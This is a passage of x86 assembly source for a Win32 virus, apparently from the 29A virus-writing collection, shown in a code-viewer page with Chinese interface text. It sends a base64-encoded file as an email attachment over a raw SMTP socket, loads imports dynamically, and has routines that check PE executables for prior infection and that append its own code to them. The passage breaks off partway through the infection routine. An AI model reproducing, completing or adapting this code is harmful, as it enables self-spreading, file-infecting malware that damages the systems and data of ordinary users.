📄 29a-7.013
字号:
push edx
push ecx
; read 3 bytes
push 0
pushptr dwNumberOfBytes
push 3
pushptr threeBytes
pushval hFile
ApiCall ReadFile
; base64 encode the three bytes
mov ecx, 3
lea esi, [ebp+threeBytes]
lea edi, [ebp+fourBytes]
call Base64Encode
; send the four base64 encoded bytes
push 0
push 4
pushptr fourBytes
pushval hSock
ApiCall send
cmp eax, -1
je exitThread
pop ecx
pop edx
loop sendAttachment
; get the remaining bytes
push edx
push 0
pushptr dwNumberOfBytes
push edx
pushptr threeBytes
pushval hFile
ApiCall ReadFile
pop edx
; base64 encode the remaining bytes
push edx
mov ecx, edx
lea esi, [ebp+threeBytes]
lea edi, [ebp+fourBytes]
call Base64Encode
pop edx
; send the remaining bytes
push 0
push 4
pushptr fourBytes
pushval hSock
ApiCall send
cmp eax, -1
je exitThread
;-------------------------------------------------------------------------------------------------;
; send the final part of the email message. ;
;-------------------------------------------------------------------------------------------------;
; send the last part of the email message
pushptr szEmailPart17
ApiCall lstrlenA
push 0
push eax
pushptr szEmailPart17
pushval hSock
ApiCall send
cmp eax, -1
je exitThread
; recieve the server response
push 0
push 256
pushptr szResponse
pushval hSock
ApiCall recv
cmp eax, -1
je exitThread
;-------------------------------------------------------------------------------------------------;
; Clean up
;-------------------------------------------------------------------------------------------------;
; free the webpage buffer
pushptr lpWebpage
ApiCall GlobalFree
; free the email message buffer
pushptr lpEmailMessage
ApiCall GlobalFree
; close wininet
pushval hInternet
ApiCall InternetCloseHandle
; close winsock
ApiCall WSACleanup
;-------------------------------------------------------------------------------------------------;
; Exit thread. ;
;-------------------------------------------------------------------------------------------------;
exitThread:
; set the thread status
mov [ebp+dwThreadStatus], EXIT_THREAD
; exit the thread
ApiCall GetCurrentThread
lea ebx, [ebp+dwExitCode]
push ebx
push eax
ApiCall GetExitCodeThread
pushval dwExitCode
ApiCall ExitThread
;-------------------------------------------------------------------------------------------------;
; Function(s) ;
;-------------------------------------------------------------------------------------------------;
Base64Encode PROC
;
; Description:
; Base64 encodes a group of bytes.
;
; Parameters:
; ecx = Number of bytes to encode.
; esi = pointer to a buffer that needs encoding.
; edi = pointer to a buffer that will recieve the encoded data.
;
; Return Values:
; None.
;
cmp ecx, 3
jl @@pad ; no groups of 3 to convert?
xor edx, edx
mov eax, ecx
mov ebx, 3
div ebx ; edx = number of padded bytes
mov ecx, eax
@@base64: ; encode groups of 3 bytes to base64
lodsd
dec esi
bswap eax
push ecx
mov ecx, 4
@@encode3:
rol eax, 6
push eax
and eax, 3fh
mov al, [ebp+@@charset+eax] ; get the base64 character
stosb
pop eax
loop @@encode3
pop ecx
loop @@base64
mov ecx, edx
cmp edx, 3
jg @@return
@@pad: ; pad any additional bytes
inc ecx
mov dword ptr [edi], '===='
mov eax, [esi]
bswap eax
@@l1:
rol eax, 6
push eax
and eax, 3fh
mov al, [ebp+@@charset+eax]
stosb
pop eax
loop @@l1
@@return:
ret
@@charset DB 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/', 0
Base64Encode ENDP
SetTimeOut PROC
;
; Description:
; Sets the timeout duration for sending and recieving data.
;
; Parameters:
; esi = socket handle.
; edi = pointer to a DWORD.
; eax = timeout duration.
;
; Return Values:
; None.
;
; set the timeout duration
mov [edi], eax
; set the timeout for recieving data
push 4
push edi
push SO_RCVTIMEO
push SOL_SOCKET
push esi
ApiCall setsockopt
; set the timeout for sending data
push 4
push edi
push SO_SNDTIMEO
push SOL_SOCKET
push esi
ApiCall setsockopt
ret
SetTimeOut ENDP
LoadImports PROC
;
; Description:
; Loads a series a dll's and the addresses of the specified functions.
;
; Parameters:
; eax = pointer to an import table.
;
; Return Values:
; If the function is successful the return value is 0. If the function fails
; the return value is -1.
;
mov edi, eax
@@loadLibrary:
push edi
ApiCall LoadLibraryA ; load the dll
cmp eax, 0
je apiLoadError
mov esi, eax
xor al, al
mov ecx, 100
repne scasb ; find the dll pointer
@@loadFunctions:
push edi
push esi
ApiCall GetProcAddress ; get function address
cmp eax, 0
je apiLoadError
mov ebx, eax
xor al, al
mov ecx, 100
repne scasb ; find function pointer
mov [edi], ebx ; save the function address
add edi, 4
cmp byte ptr [edi], 0 ; end of function list?
jne @@loadFunctions
inc edi
cmp byte ptr [edi], '$' ; end of import list?
jne @@loadLibrary
xor eax, eax
ret
@@apiLoadError:
mov eax, -1
ret
LoadImports ENDP
ConnectToHost PROC
;
; Description:
; Connects to a host.
;
; Parameters:
; eax = port.
; esi = pointer to a zero terminated host name.
;
; Return Values:
; If the function is successful the return value is the socket handle. If the function fails
; the return value is -1.
;
; fill the SOCK_ADDRESS structure
mov [ebp+sockAddress.sin_family], AF_INET
push eax
ApiCall htons
mov [ebp+sockAddress.sin_port], ax
push esi
ApiCall gethostbyname
cmp eax, 0
je @@connectionFailed
mov eax, [eax+12]
mov eax, [eax]
mov eax, [eax]
mov [ebp+sockAddress.sin_addr], eax
; Create a socket
push PCL_NONE
push SOCK_STREAM
push AF_INET
ApiCall socket
mov esi, eax
cmp eax, -1
je @@connectionFailed
; connect to host
push 16
pushptr sockAddress
push esi
ApiCall connect
cmp eax, 0
jne @@connectionFailed
mov eax, esi
ret
@@connectionFailed:
mov eax, -1
ret
ConnectToHost ENDP
IsValid PROC
;
; Description:
; Checks to see if the file is a valid win32 exe and is not already infected.
;
; Parameters:
; esi = Pointer to filename.
;
; Return Values:
; If the function is successful the return value is 0. If the function fails the return
; value is -1.
;
; open the file
push 0
push 0
push OPEN_EXISTING
push 0
push FILE_SHARE_WRITE OR FILE_SHARE_READ
push GENERIC_WRITE OR GENERIC_READ
push esi
ApiCall CreateFileA
cmp eax, -1
je @@notValid
mov [ebp+hFile], eax
; read the DOS header into memory
push 0
pushptr dwNumberOfBytes
push size DOS_HEADER
pushptr dosHeader
pushval hFile
ApiCall ReadFile
cmp word ptr [ebp+dosHeader.wSignature], 'ZM'
jne @@notValid
; seek to the PE header
push FILE_BEGIN
push 0
pushval dosHeader.lpPEHeader
pushval hFile
ApiCall SetFilePointer
; read the PE header into memory
push 0
pushptr dwNumberOfBytes
push size PE_HEADER
pushptr peHeader
pushval hFile
ApiCall ReadFile
; is it a win32 exe file?
cmp word ptr [ebp+peHeader.dwSignature], 'EP'
jne @@notValid
; calculate the location of the last section header
xor edx, edx
xor eax, eax
mov ax, [ebp+peHeader.wNumberOfSections]
dec eax
mov ebx, size SECTION_HEADER
mul ebx
add eax, [ebp+dosHeader.lpPEHeader]
add eax, size PE_HEADER
mov [ebp+lpLastSectionHeader], eax
; seek to the last section header
push FILE_BEGIN
push 0
pushval lpLastSectionHeader
pushval hFile
ApiCall SetFilePointer
; read the last section header into memory
push 0
pushptr dwNumberOfBytes
push size SECTION_HEADER
pushptr sectionHeader
pushval hFile
ApiCall ReadFile
; code already attached?
cmp dword ptr [ebp+sectionHeader.dwCharacteristics], SECTION_RWE
je @@notValid
@@isValid:
pushval hFile
ApiCall CloseHandle
xor eax, eax
ret
@@notValid:
pushval hFile
ApiCall CloseHandle
mov eax, -1
ret
IsValid ENDP
AttachCode PROC
;
; Description:
; Infects a win32 exe with this program.
;
; Parameters:
; esi = Pointer to filename.
;
; Return Values:
; If the function is successful the return value is 0. If the function fails the return
; value is -1.
;
; save the return address for this instance
push [ebp+lpReturnAddress]
; open the file
push 0
push 0
push OPEN_EXISTING
push 0
push FILE_SH⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -